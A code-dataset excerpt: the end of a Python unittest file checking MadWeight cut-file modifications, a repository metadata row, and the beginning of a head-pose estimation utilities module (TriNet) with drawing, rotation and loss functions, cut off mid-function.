self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
def test_mw_cuts(self):
file_to_mod ='./SubProcesses/cuts.bk'
rule= './Source/MadWeight/mod_file/mod_cuts'
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
rule = './Source/MadWeight/mod_file/suppress_cuts_MW'
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
def test_P_BW_cuts(self):
self.assertEqual(create_run.cut_is_active('cuts.bk'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.bk'),1)
file_to_mod='./SubProcesses/cuts.bk'
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
#modify file
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
# Next one will Fail but is not supose to be called whitout check of the second
#rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
#mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
#self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
#self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
def test_MW_BW_cuts(self):
self.assertEqual(create_run.cut_is_active('cuts.bk'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.bk'),1)
file_to_mod='./SubProcesses/cuts.bk'
rule= './Source/MadWeight/mod_file/mod_cuts'
mod_file(file_to_mod,rule, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'),1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
file_to_mod='./SubProcesses/cuts.mod'
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
#modify file
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 1)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_cuts_MG'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 1)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
rule='./Source/MadWeight/mod_file/suppress_BW_cuts'
mod_file(file_to_mod,rule,opt={'nowarning':"""['PASSCUTS','MW_NEW_DEF','DESACTIVATE_BW_CUT']"""}, write='./SubProcesses/cuts.mod')
self.assertEqual(create_run.cut_is_active('cuts.mod'), 0)
self.assertEqual(create_run.bw_cut_is_active('cuts.mod'), 0)
self.assertFalse('\n$B$' in open('./SubProcesses/cuts.mod').read())
unittest.main()
| 54.033735 | 187 | 0.417566 |
79547b1a033bc78ce4a769f4afd9c05190ea0974 | 24,529 | py | Python | utils.py | chuzcjoe/TriNet | d2689de7362f1845b5c399f1f9f66f42eb4df23f | [
"MIT"
] | 10 | 2020-02-12T20:54:10.000Z | 2022-03-17T03:18:54.000Z | utils.py | chuzcjoe/TriNet | d2689de7362f1845b5c399f1f9f66f42eb4df23f | [
"MIT"
] | 2 | 2020-04-24T22:18:41.000Z | 2021-12-27T05:22:09.000Z | utils.py | chuzcjoe/TriNet | d2689de7362f1845b5c399f1f9f66f42eb4df23f | [
"MIT"
] | 2 | 2020-02-12T20:54:37.000Z | 2020-03-26T05:17:33.000Z | # -*- coding:utf-8 -*-
"""
utils script
"""
import os
import cv2
import torch
import numpy as np
import matplotlib
#matplotlib.use("Qt4Agg")
import math
import matplotlib.pyplot as plt
from math import cos, sin
from mpl_toolkits.mplot3d.axes3d import Axes3D
#from rotation import Rotation as R
from scipy.linalg import norm
#from loss import hellinger
import math
def mkdir(dir_path):
"""
build directory
:param dir_path:
:return:
"""
if not os.path.exists(dir_path):
os.mkdir(dir_path)
def bbox_300W(txt_path):
with open(txt_path, 'r') as f:
lines = f.read().splitlines()
return list(map(int, lines[1].split(',')))
def norm_vector(v):
"""
normalization vector
:param v: vector
:return:
"""
vector_len = v.norm(dim=-1)
v = v / vector_len.unsqueeze(dim=-1)
return v
#_SQRT2 = np.sqrt(2, dtype='float32') # sqrt(2) with default precision np.float64
#_SQRT2 = torch.tensor(_SQRT2).cuda(0)
def hellinger(p, q):
# #_SQRT2 = np.sqrt(2)
return torch.norm(torch.sqrt(p) - torch.sqrt(q), dim=1) / math.sqrt(2)
# #return norm(np.sqrt(p) - np.sqrt(q)) / _SQRT2
def vector_cos(u, v):
"""
compute cos value between two vectors
:param u:
:param v:
:return:
"""
assert u.shape == v.shape, 'shape of two vectors should be same'
cos_value = torch.sum(u * v, dim=1) / torch.sqrt(torch.sum(u ** 2, dim=1) * torch.sum(v ** 2, dim=1))
cos_value = torch.clamp(cos_value, min=float(-1.0+10.0**(-4)),max=float(1.0-10.0**(-4)))
return cos_value
def load_filtered_stat_dict(model, snapshot):
model_dict = model.state_dict()
snapshot = {k: v for k, v in snapshot.items() if k in model_dict}
model_dict.update(snapshot)
model.load_state_dict(model_dict)
def softmax(input):
"""
implementation of softmax with numpy
:param input:
:return:
"""
input = input - np.max(input)
input_exp = np.exp(input)
input_exp_sum = np.sum(input_exp)
return input_exp / input_exp_sum + (10 ** -6)
def draw_bbox(img, bbox):
"""
draw face bounding box
:param img:np.ndarray(H,W,C)
:param bbox: list[x1,y1,x2,y2]
:return:
"""
x1 = int(bbox[0])
y1 = int(bbox[1])
x2 = int(bbox[2])
y2 = int(bbox[3])
img = cv2.rectangle(img, (x1, y1), (x2, y2), (255, 255, 255))
return img
def draw_front(img, x, y, width, tdx=None, tdy=None, size=100, color=(0, 255, 0)):
"""
draw face orientation vector in image
:param img: face image
:param x: x of face orientation vector,integer
:param y: y of face orientation vector,integer
:param tdx: x of start point,integer
:param tdy: y of start point,integer
:param size: length of face orientation vector
:param color:
:return:
"""
size = width
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
x2 = tdx + size * x
y2 = tdy - size * y
y2 = tdy + size * y
cv2.arrowedLine(img, (int(tdx), int(tdy)), (int(x2), int(y2)), color, tipLength=0.2, thickness=5)
return img
def draw_axis(img, pitch, yaw, roll, tdx=None, tdy=None, size=60):
"""
:param img: original images.[np.ndarray]
:param yaw:
:param pitch:
:param roll:
:param tdx: x-axis for start point
:param tdy: y-axis for start point
:param size: line size
:return:
"""
pitch = pitch
yaw = -yaw
roll = roll
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1), int(y1)), (0, 255, 255), 3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2), int(y2)), (0, 255, 0), 3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3), int(y3)), (255, 0, 0), 3)
return img
def remove_distortion(img):
DIM = (960, 720)
h, w, c = img.shape
wt = 960
ht = 720
border = [int((w-wt)/2), int((h-ht)/2), int(w - (w-wt)/2), int(h - (h-ht)/2)]
K = np.array([[424.57214422800234, 0.0, 464.31976295418264],
[0.0, 424.9291201199454, 362.78142329711255],
[0.0, 0.0, 1.0]])
D = np.array([[-0.02364380260312553], [0.03507545568167827], [-0.059312268236712096], [0.03479088452999722]])
crop_img = img[border[1]:border[3],border[0]:border[2],:]
#print(crop_img.shape)
#cv2.imshow("cropped", crop_img) # uncomment this line if error messages show up.
map1, map2 = cv2.fisheye.initUndistortRectifyMap(K, D, np.eye(3), K, DIM, cv2.CV_16SC2)
undistorted_img = cv2.remap(crop_img, map1, map2, interpolation=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT)
return undistorted_img
def draw_3d_coor(v1, v2, v3, img, ax):
zero = np.zeros(3)
# plot test data
x, y, z = zip(zero, v1)
plt.plot(y, x, z, '-r', linewidth=3)
x, y, z = zip(zero, v2)
plt.plot(y, x, z, '-g', linewidth=3)
x, y, z = zip(zero, v3)
plt.plot(y, x, z, '-b', linewidth=3)
ax.set_xlim(-1, 1)
ax.set_ylim(-1, 1)
ax.set_zlim(-1, 1)
plt.draw()
#print("draw")
plt.pause(0.0000001)
plt.cla()
def get_label_from_txt(txt_path):
with open(txt_path, 'r') as fr:
line = fr.read().splitlines()
line = line[0].split(' ')
label = [float(i) for i in line]
return label
def get_front_vector(txt_path):
with open(txt_path, 'r') as fr:
line = fr.read().splitlines()
line = line[0].split(',')
label = [float(i) for i in line]
return label
def get_info_from_txt(txt_path):
with open(txt_path, 'r') as fr:
lines = fr.read().splitlines()
line = lines[0].split(' ')
label1 = [float(i) for i in line]
line = lines[1].split(' ')
label2 = [float(i) for i in line]
line = lines[2].split(' ')
label3 = [float(i) for i in line]
line = lines[3].split(' ')
label4 = [float(i) for i in line]
return [label1,label2,label3,label4]
def Vector300W(txt_path):
with open(txt_path, 'r') as f:
lines = f.read().splitlines()
line1 = lines[2].split(',')
left_vector = [float(i) for i in line1]
line2 = lines[3].split(',')
down_vector = [float(i) for i in line2]
line3 = lines[4].split(',')
front_vector = [float(i) for i in line3]
return left_vector, down_vector, front_vector
def Bbox300W(txt_path):
with open(txt_path, 'r') as f:
lines = f.read().splitlines()
return lines[1].split(',')
def degress_score(cos_value, error_degrees):
"""
get collect score
:param cos_value: cos value of two vectors
:param error_degrees: degrees error limit value,integer
:return:
"""
score = torch.tensor([1.0 if i > cos(error_degrees * np.pi / 180) else 0.0 for i in cos_value])
return score
def get_transform(rx, ry, rz):
'''
Args:
rx, ry, rz: rotation along x, y, z axes (in radians)
Returns:
transform: 3*3 rotation matrix
'''
R_x = np.array([[1.0, 0.0, 0.0],
[0.0, np.cos(rx), np.sin(rx)],
[0.0, -np.sin(rx), np.cos(rx)]])
R_y = np.array([[np.cos(ry), 0.0, -np.sin(ry)],
[0.0, 1.0, 0.0],
[np.sin(ry), 0.0, np.cos(ry)]])
R_z = np.array([[np.cos(rz), -np.sin(rz), 0.0],
[np.sin(rz), np.cos(rz), 0.0],
[0.0, 0.0, 1.0]])
# x = np.array([1.0, 0.0, 0.0])
# y = np.array([0.0, 1.0, 0.0])
# z = np.array([0.0, 0.0, 1.0])
# n = np.array([1.0, 1.0, 0.0])
return R_z @ R_y @ R_x
def get_attention_vector(quat):
"""
get face orientation vector from quaternion
:param quat:
:return:
"""
dcm = R.quat2dcm(quat)
v_front = np.mat([[0], [0], [1]])
v_front = dcm * v_front
v_front = np.array(v_front).reshape(3)
# v_top = np.mat([[0], [1], [0]])
# v_top = dcm * v_top
# v_top = np.array(v_top).reshape(3)
# return np.hstack([v_front, v_top])
return v_front
def get_vectors(info):
# camera (x, y, z)
# We don't use them for now
xc_val = float(info[0][0])
yc_val = float(info[0][1])
zc_val = float(info[0][2])
# camera (roll, pitch, yaw)
pitchc_val = float(info[1][0])
yawc_val = float(info[1][1])
rollc_val = float(info[1][2])
# --------------------------------
# object (x, y, z)
xo_val = float(info[2][0])
yo_val = float(info[2][1])
zo_val = float(info[2][2])
# object (roll, pitch, yaw)
pitcho_val = float(info[3][0])
yawo_val = float(info[3][1])
rollo_val = float(info[3][2])
# [roll, pitch, yaw] of cameras& objects in the world
rpy_cw = np.array([rollc_val, pitchc_val, yawc_val])
rpy_ow = np.array([rollo_val, pitcho_val, yawo_val])
rpy_cw = [math.radians(x) for x in rpy_cw]
rpy_ow = [math.radians(x) for x in rpy_ow]
# get the transformations
T_wo = get_transform(rpy_ow[0], rpy_ow[1], rpy_ow[2])
T_wc = get_transform(rpy_cw[0], rpy_cw[1], rpy_cw[2])
vec_ocx = np.linalg.inv(T_wc) @ T_wo @ np.array([1.0, 0.0, 0.0])
vec_ocy = np.linalg.inv(T_wc) @ T_wo @ np.array([0.0, 1.0, 0.0])
vec_ocz = np.linalg.inv(T_wc) @ T_wo @ np.array([0.0, 0.0, 1.0])
return vec_ocx, vec_ocy, vec_ocz
def rotationMatrixToRollPitchYaw(R) :
"""
Convert 3*3 rotation matrix to roll pitch yaw in radians
Args:
R: 3*3 rotation matrix
Returns:
[roll, pitch, yaw] in degrees
"""
# assert(isRotationMatrix(R))
sy = math.sqrt(R[0,0] * R[0,0] + R[1,0] * R[1,0])
singular = sy < 1e-6
if not singular :
x = math.atan2(R[2,1] , R[2,2])
y = math.atan2(-R[2,0], sy)
z = math.atan2(R[1,0], R[0,0])
else :
x = math.atan2(-R[1,2], R[1,1])
y = math.atan2(-R[2,0], sy)
z = 0
return np.array([x, y, z]) * -1 * 180.0 / np.pi
def smooth_one_hot(true_labels, classes, smoothing=0.1):
"""
if smoothing == 0, it's one-hot method
if 0 < smoothing < 1, it's smooth method
"""
assert 0 <= smoothing < 1
#true_labels = torch.LongTensor([true_labels])
#true_labels = true_labels.type_as(torch.FloatTensor())
confidence = 1.0 - smoothing
#print(true_labels.size(0))
label_shape = torch.Size((true_labels.size(0), classes))
with torch.no_grad():
true_dist = torch.empty(size=label_shape) #device=true_labels.device)
true_dist.fill_(smoothing / (classes - 1))
true_dist.scatter_(1, true_labels.data.unsqueeze(1), confidence)
return true_dist[0]
def get_soft_label(cls_label, num_classes, slop = 1, dis_coef = 0.5, coef = 1):
"""
compute soft label replace one-hot label
:param cls_label:ground truth class label
:param num_classes:mount of classes
:return:
"""
# def metrix_fun(a, b):
# torch.IntTensor(a)
# torch.IntTensor(b)
# metrix_dis = (a - b) ** 2
# return metrix_dis
def metrix_fun(a, b):
a = a.type_as(torch.FloatTensor())
b = b.type_as(torch.FloatTensor())
metrix_dis = torch.abs(a - b) ** dis_coef
#metrix_dis = (a * slop - b * slop) ** dis_coef
#print(metrix_dis)
return metrix_dis
def exp(x):
x = x.type_as(torch.FloatTensor())
return torch.exp(x)
rt = torch.IntTensor([cls_label]*num_classes) # must be torch.IntTensor or torch.LongTensor
rk = torch.IntTensor([idx for idx in range(1, num_classes + 1, 1)])
metrix_vector = exp(-metrix_fun(rt, rk)) * coef
return metrix_vector / torch.sum(metrix_vector)
def computeLoss(cls_label_v1, cls_label_v2, cls_label_v3,
vector_label_v1, vector_label_v2, vector_label_v3,
logits, softmax, sigmoid, cls_criterion, reg_criterion, l_targets, d_targets, f_targets, params, cls_coef=1):
num_classes, alpha, beta, cls_type, reg_type, add_ortho = params
# get x,y,z cls label
x_cls_label_v1 = cls_label_v1[:, 0]
y_cls_label_v1 = cls_label_v1[:, 1]
z_cls_label_v1 = cls_label_v1[:, 2]
x_cls_label_v2 = cls_label_v2[:, 0]
y_cls_label_v2 = cls_label_v2[:, 1]
z_cls_label_v2 = cls_label_v2[:, 2]
x_cls_label_v3 = cls_label_v3[:, 0]
y_cls_label_v3 = cls_label_v3[:, 1]
z_cls_label_v3 = cls_label_v3[:, 2]
# get x,y,z continue label
x_reg_label_v1 = vector_label_v1[:, 0]
y_reg_label_v1 = vector_label_v1[:, 1]
z_reg_label_v1 = vector_label_v1[:, 2]
x_reg_label_v2 = vector_label_v2[:, 0]
y_reg_label_v2 = vector_label_v2[:, 1]
z_reg_label_v2 = vector_label_v2[:, 2]
x_reg_label_v3 = vector_label_v3[:, 0]
y_reg_label_v3 = vector_label_v3[:, 1]
z_reg_label_v3 = vector_label_v3[:, 2]
x_pred_v1, y_pred_v1, z_pred_v1, x_pred_v2, y_pred_v2, z_pred_v2, x_pred_v3, y_pred_v3, z_pred_v3 = logits
# -------------------------------------------BCELoss(for classify, manually apply softmax layer)---------------------------------------------
if cls_type == "BCE":
assert ((cls_label_v1 >= 0.) & (cls_label_v1 <= 1.)).all()
x_cls_loss_v1 = cls_criterion(sigmoid(x_pred_v1), x_cls_label_v1)
y_cls_loss_v1 = cls_criterion(sigmoid(y_pred_v1), y_cls_label_v1)
z_cls_loss_v1 = cls_criterion(sigmoid(z_pred_v1), z_cls_label_v1)
assert ((cls_label_v2 >= 0.) & (cls_label_v2 <= 1.)).all()
x_cls_loss_v2 = cls_criterion(sigmoid(x_pred_v2), x_cls_label_v2)
y_cls_loss_v2 = cls_criterion(sigmoid(y_pred_v2), y_cls_label_v2)
z_cls_loss_v2 = cls_criterion(sigmoid(z_pred_v2), z_cls_label_v2)
assert ((cls_label_v3 >= 0.) & (cls_label_v3 <= 1.)).all()
x_cls_loss_v3 = cls_criterion(sigmoid(x_pred_v3), x_cls_label_v3)
y_cls_loss_v3 = cls_criterion(sigmoid(y_pred_v3), y_cls_label_v3)
z_cls_loss_v3 = cls_criterion(sigmoid(z_pred_v3), z_cls_label_v3)
elif cls_type == 'CrossEntropy':
x_cls_loss_v1 = cls_criterion(x_pred_v1, l_targets[:,0])
y_cls_loss_v1 = cls_criterion(y_pred_v1, l_targets[:,1])
z_cls_loss_v1 = cls_criterion(z_pred_v1, l_targets[:,2])
x_cls_loss_v2 = cls_criterion(x_pred_v2, d_targets[:,0])
y_cls_loss_v2 = cls_criterion(y_pred_v2, d_targets[:,1])
z_cls_loss_v2 = cls_criterion(z_pred_v2, d_targets[:,2])
x_cls_loss_v3 = cls_criterion(x_pred_v3, f_targets[:,0])
y_cls_loss_v3 = cls_criterion(y_pred_v3, f_targets[:,1])
z_cls_loss_v3 = cls_criterion(z_pred_v3, f_targets[:,2])
#----------------------------------------FocalLoss-----------------------------------------
elif cls_type == 'FocalLoss':
x_cls_loss_v1 = cls_criterion(x_pred_v1, l_targets[:,0])
y_cls_loss_v1 = cls_criterion(y_pred_v1, l_targets[:,1])
z_cls_loss_v1 = cls_criterion(z_pred_v1, l_targets[:,2])
x_cls_loss_v2 = cls_criterion(x_pred_v2, d_targets[:,0])
y_cls_loss_v2 = cls_criterion(y_pred_v2, d_targets[:,1])
z_cls_loss_v2 = cls_criterion(z_pred_v2, d_targets[:,2])
x_cls_loss_v3 = cls_criterion(x_pred_v3, f_targets[:,0])
y_cls_loss_v3 = cls_criterion(y_pred_v3, f_targets[:,1])
z_cls_loss_v3 = cls_criterion(z_pred_v3, f_targets[:,2])
# -------------------------------------------KL Divergence Loss-------------------------------------
elif cls_type == "KLDiv":
x_cls_loss_v1 = cls_criterion((softmax(x_pred_v1)+10e-6).log(), x_cls_label_v1+10e-6)
y_cls_loss_v1 = cls_criterion((softmax(y_pred_v1)+10e-6).log(), y_cls_label_v1+10e-6)
z_cls_loss_v1 = cls_criterion((softmax(z_pred_v1)+10e-6).log(), z_cls_label_v1+10e-6)
x_cls_loss_v2 = cls_criterion((softmax(x_pred_v2)+10e-6).log(), x_cls_label_v2+10e-6)
y_cls_loss_v2 = cls_criterion((softmax(y_pred_v2)+10e-6).log(), y_cls_label_v2+10e-6)
z_cls_loss_v2 = cls_criterion((softmax(z_pred_v2)+10e-6).log(), z_cls_label_v2+10e-6)
x_cls_loss_v3 = cls_criterion((softmax(x_pred_v3)+10e-6).log(), x_cls_label_v3+10e-6)
y_cls_loss_v3 = cls_criterion((softmax(y_pred_v3)+10e-6).log(), y_cls_label_v3+10e-6)
z_cls_loss_v3 = cls_criterion((softmax(z_pred_v3)+10e-6).log(), z_cls_label_v3+10e-6)
length = x_pred_v1.shape[0]
# get prediction vector(get continue value from classify result)
x_reg_pred_v1, y_reg_pred_v1, z_reg_pred_v1, vector_pred_v1 = classify2vector(x_pred_v1, y_pred_v1, z_pred_v1, softmax, num_classes)
x_reg_pred_v2, y_reg_pred_v2, z_reg_pred_v2, vector_pred_v2 = classify2vector(x_pred_v2, y_pred_v2, z_pred_v2, softmax, num_classes)
x_reg_pred_v3, y_reg_pred_v3, z_reg_pred_v3, vector_pred_v3 = classify2vector(x_pred_v3, y_pred_v3, z_pred_v3, softmax, num_classes)
# Regression loss
if reg_type == "value":
x_reg_loss_v1 = reg_criterion(x_reg_pred_v1, x_reg_label_v1)
y_reg_loss_v1 = reg_criterion(y_reg_pred_v1, y_reg_label_v1)
z_reg_loss_v1 = reg_criterion(z_reg_pred_v1, z_reg_label_v1)
x_reg_loss_v2 = reg_criterion(x_reg_pred_v2, x_reg_label_v2)
y_reg_loss_v2 = reg_criterion(y_reg_pred_v2, y_reg_label_v2)
z_reg_loss_v2 = reg_criterion(z_reg_pred_v2, z_reg_label_v2)
x_reg_loss_v3 = reg_criterion(x_reg_pred_v3, x_reg_label_v3)
y_reg_loss_v3 = reg_criterion(y_reg_pred_v3, y_reg_label_v3)
z_reg_loss_v3 = reg_criterion(z_reg_pred_v3, z_reg_label_v3)
#-----------cls+reg loss-------------------------
loss_v1 = cls_coef * (x_cls_loss_v1 + y_cls_loss_v1 + z_cls_loss_v1) + alpha * (x_reg_loss_v1 + y_reg_loss_v1 + z_reg_loss_v1)
loss_v2 = cls_coef * (x_cls_loss_v2 + y_cls_loss_v2 + z_cls_loss_v2) + alpha * (x_reg_loss_v2 + y_reg_loss_v2 + z_reg_loss_v2)
loss_v3 = cls_coef * (x_cls_loss_v3 + y_cls_loss_v3 + z_cls_loss_v3) + alpha * (x_reg_loss_v3 + y_reg_loss_v3 + z_reg_loss_v3)
#-------------------------acos loss---------------------------------
if reg_type == 'acos':
reg_loss_v1 = reg_criterion(torch.acos(vector_cos(vector_label_v1, vector_pred_v1)), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
